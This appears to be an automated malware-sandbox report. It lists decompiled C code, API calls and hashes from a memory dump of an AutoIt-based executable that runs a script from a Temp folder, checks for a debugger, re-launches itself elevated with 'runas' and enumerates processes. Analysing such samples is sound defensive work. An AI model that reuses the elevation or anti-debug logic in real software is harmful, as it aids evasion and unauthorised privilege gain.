                            0x00000000
                            0x00000000
                            0x00a999fc
                            0x00a999fc
                            0x00a999ff
                            0x00a99a02
                            0x00a99a03
                            0x00000000
                            0x00a99a05
                            0x00a99a05
                            0x00000000
                            0x00a99a05
                            0x00a99a03
                            0x00a9a8c5
                            0x00a9a8c5
                            0x00a9a8c8
                            0x00a9a8cc
                            0x00a9a8cc
                            0x00a999d0
                            0x00000000
                            0x00a999c2

                            APIs
                            • _wcslen.LIBCMT ref: 00A99911
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • _memmove.LIBCMT ref: 00A9995C
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00A999A3
                            • _memmove.LIBCMT ref: 00A99FE6
                            • _memmove.LIBCMT ref: 00A9A914
                            • _memmove.LIBCMT ref: 00AB9769
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                            • String ID:
                            • API String ID: 2383988440-0
                            • Opcode ID: ca6c72dd12c40bde1239571821ef4f2d951b4af7dbfca23ac0599ec5b48b7d2f
                            • Instruction ID: 8fbbf2e780c7ea5831ad3ea4ea90b64f9dd638cf937637bbf8668ebd34553109
                            • Opcode Fuzzy Hash: ca6c72dd12c40bde1239571821ef4f2d951b4af7dbfca23ac0599ec5b48b7d2f
                            • Instruction Fuzzy Hash: 8B136DB4608340DFDB24DF28C581A6AB7F5BF99300F24895EE58A8B352D735EC45CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A935F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00A935F0(void* __edx, void* __fp0, char _a1, char _a2, signed int _a3, void* _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, char _a48, intOrPtr _a52, signed char _a68, intOrPtr _a72, char _a84, WCHAR* _a92, short _a96, short _a624, char _a1152, short _a1672, char _a2200, char _a10392, char _a10912) {
				char _v0;
				char _v19;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed int _t147;
				void* _t151;
				void* _t156;
				signed char _t180;
				char _t182;
				intOrPtr _t183;
				void* _t191;
				void* _t197;
				signed int _t198;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t207;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				char* _t215;
				intOrPtr* _t216;
				signed int _t225;
				intOrPtr _t226;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t282;
				intOrPtr* _t284;
				signed int _t285;
				signed int _t286;
				void* _t288;
				void* _t290;
				void* _t291;

				_t322 = __fp0;
				_t286 = _t285 & 0xfffffff8;
				E00AB2160(0x2cac);
				_t146 =  *0xb39538; // 0x0
				_t147 = _t146 + 1;
				 *0xb39538 = _t147;
				_t294 = _t147 - 0x30;
				if(_t147 >= 0x30) {
					E00AE3F89(__eflags, __fp0, _a4, _a16, _a24, L"#include depth exceeded.  Make sure there are no recursive includes", _a20);
					 *0xb39538 =  *0xb39538 - 1;
					_t151 = 0;
					L42:
					return _t151;
				}
				_t270 = _a8;
				_t225 = 1;
				_a4 = 0;
				_a1 = 1;
				_a3 = 1;
				_a2 = 0;
				E00A9DA00( &_a24, _t294);
				E00A91D10(_t270,  &_a8, _t294);
				_t156 = E00A9E060(0x2000,  &_a24, _t270,  &_a8); // executed
				if(_t156 == 0) {
					_v0 = 1;
				} else {
					_v0 = 0;
				}
				E00A92480( &_a8);
				if(_v0 != 0) {
					E00AE3F89(__eflags, _t322, _a4, _a16, _a24, L"Error opening the file", _a20);
					E00AD3EE3( &_a4);
					 *0xb39538 =  *0xb39538 - 1;
					_t151 = 0;
					goto L42;
				} else {
					GetCurrentDirectoryW(0x104,  &_a1672);
					GetFullPathNameW(_t270, 0x104,  &_a96,  &_a92);
					E00AA392E( &_a96,  &_a84,  &_a1152,  &_a10912,  &_a10392);
					E00AA1487( &_a624,  &_a84);
					E00AA1456( &_a624,  &_a1152);
					_t288 = _t286 + 0x24;
					_t237 =  &_a624;
					SetCurrentDirectoryW( &_a624); // executed
					while(_t225 == 1) {
						_a2200 = 0;
						E00A93580( &_a48);
						_t180 = _a68;
						if((_t180 & 0x00000003) != 0) {
							_t182 = E00AEF632(_t237, __eflags, _t322,  &_a24,  &_a48); // executed
							_t226 = 0;
						} else {
							_t299 = _t180 & 0x00000004;
							if((_t180 & 0x00000004) != 0) {
								_t182 = E00AF7AAE( &_a24, __eflags, _t322,  &_a24,  &_a48);
								_t226 = 0;
							} else {
								_t226 = 0;
								_push(0x10);
								_a12 = 0;
								_a16 = 0x10;
								_t215 = E00AA14F7(_t270,  &_a48, _t299);
								_push(4);
								_a8 = _t215;
								 *_t215 = 0;
								_t216 = E00AA14F7(_t270,  &_a48, _t299);
								_t288 = _t288 + 8;
								if(_t216 == 0) {
									_a20 = 0;
								} else {
									 *_t216 = 1;
									_a20 = _t216;
								}
								if(E00A939D0( &_a24,  &_a8, _t322) == 0) {
									E00A91590( &_a8);
									_t182 = 0;
								} else {
									E00A93D20(_t226,  &_a8,  &_a48);
									_t284 = _a12;
									 *_t284 =  *_t284 - 1;
									if( *_t284 == 0) {
										_t237 = _a8;
										_push(_a8);
										E00AA10FC();
										_push(_t284);
										E00AA10FC();
										_t288 = _t288 + 8;
									}
									_t182 = 1;
								}
							}
						}
						if(_t182 == 0) {
							L41:
							E00A9D9C0( &_a24);
							_a68 = _t226;
							_a72 = _t226;
							SetCurrentDirectoryW( &_a1672);
							E00A9D9C0( &_a24);
							_a68 = _t226;
							_a72 = _t226;
							E00A92480( &_a48);
							E00A9D9C0( &_a24);
							_push(_a28); // executed
							E00AA10FC(); // executed
							_t151 = _a1;
							 *0xb39538 =  *0xb39538 - 1;
							__eflags =  *0xb39538;
							goto L42;
						} else {
							_t183 = _a52;
							if(_t183 > 0xffe) {
								_t277 = _t183 - 0xffe;
								E00A92920( &_a48);
								E00AA0D80(_a48 + 0x1ffc, _a48 + 0x1ffc + _t277 * 2, _a52 - _t277 + _a52 - _t277 - 0x1ffa);
								_t288 = _t288 + 0xc;
								_a52 = _a52 - _t277;
							}
							E00AA1487( &_a2200, _a48);
							_a4 = _a4 + 1;
							_t290 = _t288 + 8;
							_t278 = 0;
							_t270 = 0;
							while(1) {
								_t227 =  *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff;
								_t191 = E00AA316E( *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff);
								_t288 = _t290 + 4;
								if(_t191 == 0) {
									break;
								}
								_t213 = E00AA3145(_t237, _t227);
								_t290 = _t288 + 4;
								if(_t213 != 0) {
									_t278 = _t278 + 1;
									continue;
								}
								break;
							}
							if( *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2)) == _t270) {
								L21:
								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) = 0;
								if(E00A93BD0( &_a2200) == 0) {
									E00AE3F89(__eflags, _t322, _a4, _a16, _a4, L"Unterminated string",  &_a2200);
									_v19 = 0;
									break;
								}
								_t197 = E00AA10E1( &_a2200);
								_t291 = _t288 + 4;
								if(_t197 == 0) {
									L28:
									_v0 = 0;
									_t198 = E00AA10E1( &_a2200);
									_t288 = _t291 + 4;
									if(_t198 > 2) {
										_t280 = _t198;
										_t210 = E00AA3145( *(_t288 + 0x8a4 + _t280 * 2) & 0x7f,  *(_t288 + 0x8a4 + _t280 * 2) & 0x7f);
										_t288 = _t288 + 4;
										if(_t210 != 0) {
											__eflags =  *((short*)(_t288 + 0x8a6 + _t280 * 2)) - 0x5f;
											if( *((short*)(_t288 + 0x8a6 + _t280 * 2)) == 0x5f) {
												 *((short*)(_t288 + 0x8a6 + _t280 * 2)) = 0;
												_v0 = 1;
											}
										}
									}
									if(_a2 == 1) {
										_t237 = _a4;
										E00AC494A(_a4,  &_a2200);
									} else {
										_t279 = _a4;
										_t237 = _a4; // executed
										_t202 = E00A93C50(_a4,  &_a2200, _t322,  &_a2200,  &_a96,  &_a4,  &_a24); // executed
										if(_t202 != 3) {
											_t203 = _t202;
											__eflags = _t203;
											if(_t203 == 0) {
												_a1 = 0;
												L33:
												if(_v0 == 1) {
													_a2 = 1;
												} else {
													_a2 = 0;
												}
												if(_a1 != 1) {
													break;
												} else {
													_t225 = _a3;
													continue;
												}
											}
											_t204 = _t203 - 2;
											__eflags = _t204;
											if(_t204 == 0) {
												goto L32;
											}
											_t207 = _t204 - 2;
											__eflags = _t207;
											if(_t207 == 0) {
												_a3 = _t207;
											}
											goto L33;
										}
										L32:
										_t237 = _a4;
										E00A93C80( &_a2200, _a4, _t279, _a4, _a12); // executed
									}
									goto L33;
								}
								_t66 = _t197 - 1; // -1
								_t282 = _t66;
								if(_t282 < 0) {
									L27:
									 *((short*)(_t291 + 0x8aa + _t282 * 2)) = 0;
									goto L28;
								}
								while(1) {
									_t270 =  *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff;
									_t211 = E00AA316E( *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff);
									_t291 = _t291 + 4;
									if(_t211 == 0) {
										goto L27;
									}
									_t212 = E00AA3145(_t237, _t270);
									_t291 = _t291 + 4;
									if(_t212 != 0) {
										_t282 = _t282 - 1;
										__eflags = _t282;
										if(_t282 >= 0) {
											continue;
										}
									}
									goto L27;
								}
								goto L27;
							} else {
								goto L20;
							}
							do {
								L20:
								_t237 =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
								_t278 = _t278 + 1;
								_t270 =  &(_t270[0]);
							} while ( *((short*)(_t288 + 0x8a8 + _t278 * 2)) != 0);
							goto L21;
						}
					}
					_t226 = 0;
					goto L41;
				}
			}








































                            0x00a935f0
                            0x00a935f3
                            0x00a935fb
                            0x00a93600
                            0x00a93606
                            0x00a93609
                            0x00a9360e
                            0x00a93611
                            0x00ab8186
                            0x00ab818b
                            0x00ab8191
                            0x00a939bd
                            0x00a939c3
                            0x00a939c3
                            0x00a93617
                            0x00a9361a
                            0x00a93620
                            0x00a93628
                            0x00a9362d
                            0x00a93631
                            0x00a93636
                            0x00a9363f
                            0x00a9364e
                            0x00a93655
                            0x00ab8198
                            0x00a9365b
                            0x00a9365b
                            0x00a9365b
                            0x00a93664
                            0x00a9366e
                            0x00ab81b7
                            0x00ab81c1
                            0x00ab81c6
                            0x00ab81cc
                            0x00000000
                            0x00a93674
                            0x00a93681
                            0x00a93697
                            0x00a936c2
                            0x00a936d7
                            0x00a936ec
                            0x00a936f1
                            0x00a936f4
                            0x00a936fc
                            0x00a93702
                            0x00a93711
                            0x00a93719
                            0x00a9371e
                            0x00a93724
                            0x00ab81fc
                            0x00ab8201
                            0x00a9372a
                            0x00a9372a
                            0x00a9372c
                            0x00ab81dd
                            0x00ab81e2
                            0x00a93732
                            0x00a93732
                            0x00a93734
                            0x00a93736
                            0x00a9373a
                            0x00a93742
                            0x00a9374a
                            0x00a9374c
                            0x00a93750
                            0x00a93752
                            0x00a93757
                            0x00a9375c
                            0x00ab81e9
                            0x00a93762
                            0x00a93762
                            0x00a93768
                            0x00a93768
                            0x00a9377b
                            0x00a93960
                            0x00a93965
                            0x00a93781
                            0x00a93787
                            0x00a9378c
                            0x00a93790
                            0x00a93792
                            0x00a93794
                            0x00a93798
                            0x00a93799
                            0x00a937a1
                            0x00a937a2
                            0x00a937a7
                            0x00a937a7
                            0x00a937aa
                            0x00a937aa
                            0x00a9377b
                            0x00a9372c
                            0x00a937ae
                            0x00a9396c
                            0x00a93970
                            0x00a9397d
                            0x00a93981
                            0x00a93985
                            0x00a9398b
                            0x00a93994
                            0x00a93998
                            0x00a9399c
                            0x00a939a1
                            0x00a939aa
                            0x00a939ab
                            0x00a939b0
                            0x00a939b7
                            0x00a939b7
                            0x00000000
                            0x00a937b4
                            0x00a937b4
                            0x00a937bd
                            0x00ab8208
                            0x00ab8212
                            0x00ab8237
                            0x00ab823c
                            0x00ab823f
                            0x00ab823f
                            0x00a937d0
                            0x00a937d5
                            0x00a937d9
                            0x00a937dc
                            0x00a937de
                            0x00a937e0
                            0x00a937e0
                            0x00a937e9
                            0x00a937ee
                            0x00a937f3
                            0x00000000
                            0x00000000
                            0x00a937f6
                            0x00a937fb
                            0x00a93800
                            0x00a93946
                            0x00000000
                            0x00a93946
                            0x00000000
                            0x00a93800
                            0x00a9380e
                            0x00a9382d
                            0x00a93836
                            0x00a93845
                            0x00ab82ce
                            0x00ab82d3
                            0x00000000
                            0x00ab82d3
                            0x00a93853
                            0x00a93858
                            0x00a9385d
                            0x00a938a0
                            0x00a938a8
                            0x00a938ad
                            0x00a938b2
                            0x00a938b8
                            0x00a938ba
                            0x00a938cc
                            0x00a938d1
                            0x00a938d6
                            0x00a9394c
                            0x00a93955
                            0x00ab825d
                            0x00ab8260
                            0x00ab8260
                            0x00a93955
                            0x00a938d6
                            0x00a938dd
                            0x00ab826a
                            0x00ab8276
                            0x00a938e3
                            0x00a938e3
                            0x00a938fd
                            0x00a938ff
                            0x00a93907
                            0x00ab8280
                            0x00ab8280
                            0x00ab8283
                            0x00ab82a0
                            0x00a93922
                            0x00a93927
                            0x00ab82aa
                            0x00a9392d
                            0x00a9392d
                            0x00a9392d
                            0x00a93937
                            0x00000000
                            0x00a9393d
                            0x00a9393d
                            0x00000000
                            0x00a9393d
                            0x00a93937
                            0x00ab8285
                            0x00ab8285
                            0x00ab8288
                            0x00000000
                            0x00000000
                            0x00ab828e
                            0x00ab828e
                            0x00ab8291
                            0x00ab8297
                            0x00ab8297
                            0x00000000
                            0x00ab8291
                            0x00a9390d
                            0x00a93910
                            0x00a9391d
                            0x00a9391d
                            0x00000000
                            0x00a938dd
                            0x00a9385f
                            0x00a9385f
                            0x00a93864
                            0x00a93896
                            0x00a93898
                            0x00000000
                            0x00a93898
                            0x00a93870
                            0x00a93870
                            0x00a93879
                            0x00a9387e
                            0x00a93883
                            0x00000000
                            0x00000000
                            0x00a93886
                            0x00a9388b
                            0x00a93890
                            0x00ab8248
                            0x00ab8248
                            0x00ab8249
                            0x00000000
                            0x00000000
                            0x00ab824f
                            0x00000000
                            0x00a93890
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a93810
                            0x00a93810
                            0x00a93810
                            0x00a93818
                            0x00a93820
                            0x00a93821
                            0x00a93822
                            0x00000000
                            0x00a93810
                            0x00a937ae
                            0x00ab82d8
                            0x00000000
                            0x00ab82d8

                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00A93681
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A93697
                            • __wsplitpath.LIBCMT ref: 00A936C2
                              • Part of subcall function 00AA392E: __wsplitpath_helper.LIBCMT ref: 00AA3970
                            • _wcscpy.LIBCMT ref: 00A936D7
                            • _wcscat.LIBCMT ref: 00A936EC
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00A936FC
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                              • Part of subcall function 00A93D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00A9378C,?,?,?,00000010), ref: 00A93D38
                              • Part of subcall function 00A93D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00A93D71
                            • _wcscpy.LIBCMT ref: 00A937D0
                            • _wcslen.LIBCMT ref: 00A93853
                            • _wcslen.LIBCMT ref: 00A938AD
                            Strings
                            • Unterminated string, xrefs: 00AB82C6
                            • _, xrefs: 00A9394C
                            • Error opening the file, xrefs: 00AB81AF
                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00AB817E
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                            • API String ID: 3393021363-188983378
                            • Opcode ID: 7211882b0224add725a7734343c168343b38320b6d16c3f90fc6fce4b472eac7
                            • Instruction ID: d4a2708a853bf8a670b95217b683f52944bf637bc7a3e1a51b28c929129af3a8
                            • Opcode Fuzzy Hash: 7211882b0224add725a7734343c168343b38320b6d16c3f90fc6fce4b472eac7
                            • Instruction Fuzzy Hash: 3AD1AEB2608341AADF10EF68C941AEFB7F8AF95300F04892DF58647142DB75DA49C7A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E00A9D7A0(short* __eax, void* __ecx, void* __eflags, void* __fp0) {
				int _v5;
				char _v6;
				short* _v24;
				short _v556;
				short _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t22;
				void* _t25;
				int _t28;
				int _t29;
				void* _t51;
				char _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t59;
				struct tagMSG* _t68;
				short* _t72;
				void* _t79;
				void* _t81;

				_t87 = __fp0;
				_t79 = __eflags;
				_t59 = __ecx;
				_t72 = __eax;
				GetCurrentDirectoryW(0x104,  &_v556);
				E00A92190(_t59, _t79, _t72);
				_t22 = IsDebuggerPresent();
				if(_t22 != 0) {
					return MessageBoxA(0, "It is a violation of the AutoIt EULA to attempt to reverse engineer this program.", "AutoIt", 0x10);
				}
				_v5 = _t22;
				_t81 =  *0xb37f54 - 1; // 0x2
				if(_t81 == 0) {
					_t55 =  *0xb37f5c; // 0x3202f98
					_v6 = 0;
					E00A93C80(_t55, _t59, 0xb390e8, 1, 0xffffffff);
					_t60 =  *0xb274e8;
					_t56 = _v6;
					 *0xb390eb =  *0xb274e8;
					L4:
					_t68 =  *0xb37f54; // 0x2
					_t25 = E00A916A0(_t60, _t68, "C:\Users\engineer\AppData\Local\Temp\82139548\rpgc.htg", _t68); // executed
					if(_t25 != 0) {
						E00A910C0(0xb390e8);
						_t28 = SetCurrentDirectoryW( &_v556);
						 *0xb274f4 = 1;
						return _t28;
					}
					if(_t56 == 1) {
						_t29 = E00AC2FD3();
						__eflags = _t29;
						if(_t29 != 0) {
							goto L6;
						}
						_t64 =  &_v1084;
						GetModuleFileNameW(0,  &_v1084, 0x104);
						__eflags = _v5;
						if(__eflags == 0) {
							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _t72,  &_v556, 1);
						} else {
							_t78 =  &_v24;
							E00A91D10("\"",  &_v24, __eflags);
							E00A91DE0(_t78,  &_v1084, 0xb37f6c, _t87);
							E00A91DE0(_t78, _t64, "\"", _t87);
							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _v24,  &_v556, 1);
							E00A92480(_t78);
						}
						L10:
						E00A910C0(0xb390e8);
						_push( &_v556);
						L11:
						return SetCurrentDirectoryW();
					}
					L6:
					E00AA03E0(); // executed
					E00AA0350();
					if( *0xb37f58 == 0) {
						E00A9E2C0(0xb38710, _t87);
					}
					E00A99430(0xb38178, _t68, _t87, 1); // executed
					if( *0xb37f58 == 0) {
						E00A91240(0xb38710);
					}
					goto L10;
				}
				_t51 = E00A9F1D0(0xb37f6c, 0xb390e8, __fp0, 0xb37f54); // executed
				if(_t51 == 0) {
					 *0xb274f4 = 1;
					_push( &_v556);
					goto L11;
				} else {
					_t52 =  *0xb390e8; // 0x1
					_t56 =  *0xb390e9; // 0x0
					_t60 =  &_v1084;
					 *0xb37f58 = _t52;
					GetFullPathNameW("C:\Users\engineer\AppData\Local\Temp\82139548\rpgc.htg", 0x104,  &_v1084, 0xb37f50);
					goto L4;
				}
			}
























                            0x00a9d7a0
                            0x00a9d7a0
                            0x00a9d7a0
                            0x00a9d7ac
                            0x00a9d7ba
                            0x00a9d7c1
                            0x00a9d7c6
                            0x00a9d7ce
                            0x00000000
                            0x00abe14f
                            0x00a9d7d9
                            0x00a9d7e1
                            0x00a9d7e7
                            0x00abe15d
                            0x00abe163
                            0x00abe167
                            0x00abe16c
                            0x00abe172
                            0x00abe175
                            0x00a9d833
                            0x00a9d833
                            0x00a9d83f
                            0x00a9d846
                            0x00abe197
                            0x00abe1a3
                            0x00abe1a9
                            0x00000000
                            0x00abe1a9
                            0x00a9d84f
                            0x00abe1b8
                            0x00abe1bd
                            0x00abe1bf
                            0x00000000
                            0x00000000
                            0x00abe1ca
                            0x00abe1d3
                            0x00abe1d9
                            0x00abe1dd
                            0x00abe253
                            0x00abe1df
                            0x00abe1e4
                            0x00abe1e7
                            0x00abe1f3
                            0x00abe1ff
                            0x00abe224
                            0x00abe22c
                            0x00abe22c
                            0x00a9d891
                            0x00a9d896
                            0x00a9d8a1
                            0x00a9d8a2
                            0x00000000
                            0x00a9d8a2
                            0x00a9d855
                            0x00a9d855
                            0x00a9d85a
                            0x00a9d866
                            0x00a9d86d
                            0x00a9d86d
                            0x00a9d879
                            0x00a9d885
                            0x00a9d88c
                            0x00a9d88c
                            0x00000000
                            0x00a9d885
                            0x00a9d7fa
                            0x00a9d801
                            0x00abe186
                            0x00abe18c
                            0x00000000
                            0x00a9d807
                            0x00a9d807
                            0x00a9d80c
                            0x00a9d817
                            0x00a9d828
                            0x00a9d82d
                            0x00000000
                            0x00a9d82d

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00A9D7BA
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A92262
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A92278
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A9228E
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A922A4
                              • Part of subcall function 00A92190: _wcscpy.LIBCMT ref: 00A922C4
                            • IsDebuggerPresent.KERNEL32 ref: 00A9D7C6
                            • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00000104,?,00B37F50,00B37F54), ref: 00A9D82D
                              • Part of subcall function 00A916A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A916E5
                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00A9D8A2
                            • MessageBoxA.USER32 ref: 00ABE14F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00ABE1A3
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00ABE1D3
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00ABE21D
                            • ShellExecuteW.SHELL32(00000000), ref: 00ABE224
                              • Part of subcall function 00AA03E0: GetSysColorBrush.USER32(0000000F), ref: 00AA03EB
                              • Part of subcall function 00AA03E0: LoadCursorW.USER32(00000000,00007F00), ref: 00AA03FA
                              • Part of subcall function 00AA03E0: LoadIconW.USER32(?,00000063), ref: 00AA0410
                              • Part of subcall function 00AA03E0: LoadIconW.USER32(?,000000A4), ref: 00AA0423
                              • Part of subcall function 00AA03E0: LoadIconW.USER32(?,000000A2), ref: 00AA0436
                              • Part of subcall function 00AA03E0: LoadImageW.USER32 ref: 00AA045E
                              • Part of subcall function 00AA03E0: RegisterClassExW.USER32 ref: 00AA04AD
                              • Part of subcall function 00AA0350: CreateWindowExW.USER32 ref: 00AA0385
                              • Part of subcall function 00AA0350: CreateWindowExW.USER32 ref: 00AA03AE
                              • Part of subcall function 00AA0350: ShowWindow.USER32(?,00000000), ref: 00AA03C4
                              • Part of subcall function 00AA0350: ShowWindow.USER32(?,00000000), ref: 00AA03CE
                              • Part of subcall function 00A9E2C0: _memset.LIBCMT ref: 00A9E2E2
                              • Part of subcall function 00A9E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A9E3A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__memset_wcscpy
                            • String ID: AutoIt$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                            • API String ID: 765478012-2436220068
                            • Opcode ID: c3356380b1f36f6e112720967532020db8cfab87138cd7154ee2e40b2ed49b05
                            • Instruction ID: 7d49b74a4c950d5bc72f11d5813c5cdb8138c2fdc5418937a6c2e8cc34c9fe29
                            • Opcode Fuzzy Hash: c3356380b1f36f6e112720967532020db8cfab87138cd7154ee2e40b2ed49b05
                            • Instruction Fuzzy Hash: 4C411571B44244ABDF20EBA4ED46BED77F8AB48710FA041D4F64557292CFB449C8C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC3EC5, Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC3EE2
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AC3EF2
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AC3F1D
                            • __wsplitpath.LIBCMT ref: 00AC3F48
                              • Part of subcall function 00AA392E: __wsplitpath_helper.LIBCMT ref: 00AA3970
                            • _wcscat.LIBCMT ref: 00AC3F5B
                            • __wcsicoll.LIBCMT ref: 00AC3F6B
                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00AC3FA4
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 2431060436-0
                            • Opcode ID: d8b8ed092e85f66a4805c879cb5e4f599887b6e8ab987c05794fb63a4472f97f
                            • Instruction ID: bc8e0f4bad3f15e2dd0fa574b63172d4e5e57d3f55c446ea9af8fc7508eee80e
                            • Opcode Fuzzy Hash: d8b8ed092e85f66a4805c879cb5e4f599887b6e8ab987c05794fb63a4472f97f
